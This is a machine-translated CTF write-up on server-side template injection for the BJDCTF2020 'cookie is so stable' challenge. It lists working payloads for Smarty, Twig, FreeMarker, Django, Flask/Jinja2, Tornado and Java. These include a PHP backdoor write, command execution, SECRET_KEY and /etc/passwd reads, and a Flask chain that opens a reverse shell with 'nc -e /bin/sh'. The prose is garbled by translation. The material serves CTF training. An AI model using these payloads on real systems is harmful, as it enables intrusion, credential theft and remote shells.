SSTI template injection vulnerability summary [bjdctf2020]cookie is so stable

Knowledge point ：

Summary of template injection vulnerabilities ： Reference resources ： Very comprehensive summary ： An article takes you to understand the loophole SSTI Loophole | K0rz3n's Blog

1. Common template engine

PHP：smarty Twig Blade;

python : jinja2 django tornado

java : JSP FreeMarker Velocity

After receiving the malicious input from the user on the server , Treat it as... Without any treatment Web Part of the application template content , The template engine is in the process of target compilation and rendering , Executed a statement inserted by the user that can destroy the template , This may lead to the disclosure of sensitive information 、 Code execution 、GetShell Other questions . 

For details, please refer to ; Let's talk about using ;

Injection detection ： Tools ：GitHub - epinna/tplmap: Server-Side Template Injection and Code Injection Detection and Exploitation Tool

Use ：

Tplmap Installation and usage of （ It contains a tutorial to solve the problem of missing library errors ）_ Small white Luo Bu's blog -CSDN Blog _tplmap

 Twig
{ {7*‘7’}} Output 49
Jinja
{ {7*‘7’}} Output 7777777

  attack ：

Direction of attack ：

Finding template injection mainly attacks from three directions

(1) The template itself
(2) The framework itself
(3) The language itself

1. The template itself ;

（1）Smarty

payload

Open file ：

{self::getStreamVariable("file:///proc/self/loginuid")}

  Write back door ：

{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

（2）Twig

payload： among id Is the command ;

{
   {_self.env.registerUndefinedFilterCallback("exec")}}{
   {_self.env.getFilter("id")}}

 （3）freeMarker

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

2. Use the characteristics of the framework itself to attack

 1）.Django

http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY}

http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY}

2）.Flask/Jinja2

config yes Flask A global object in the template , It represents “ Current configuration object (flask.config)”, It is a dictionary like object , It contains the configuration values of all applications . in the majority of cases , It contains, for example, database link strings , Credentials connected to third parties ,SECRET_KEY Equal sensitivity value . although config Is a dictionary like object , But by looking up the documents, you can find config There are many magical ways ：from_envvar, from_object, from_pyfile, as well as root_path.

{
   { ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }}
// Writing documents 
{
   { config.from_pyfile('/tmp/evil') }}
// load system
{
   { config['SHELL']('nc xxxx xx -e /bin/sh') }}
// Execute command bounce SHELL

3）.Tornado

http://117.78.26.79:31093/error?msg={
   {handler.settings}}

 3. Use the characteristics of modular language to attack

 1）python

Python Sandbox escape memo | K0rz3n's Blog

2）.JAVA

payload：

${T(java.lang.System).getenv()}

${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

Of course, if the file operation needs to use another class , The idea is unchanged

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

Back to topic ：
stay flag Interface input { {7*7}}

The echo 49;

Template injection exists ;

Topic tips cookie;

Grab the bag and have a look ： It's fine too F12 Network view packet discovery ;

  There is one set-cookie;

That is, where the template is injected ：

First use sytem() try ;

  no way , Let's see what kind of injection this is ：

Use { {7*'7'}} Echo again 49, Seems to be Twig;

Go straight up payload：

{ {_self.env.registerUndefinedFilterCallback("exec")}}{ {_self.env.getFilter("cat /flag")}}

（ To construct in the second packet cookie Of user; Here is the first one , In the parameter username Direct construction is not impossible ）

  It can be used F12 Look at the packets ：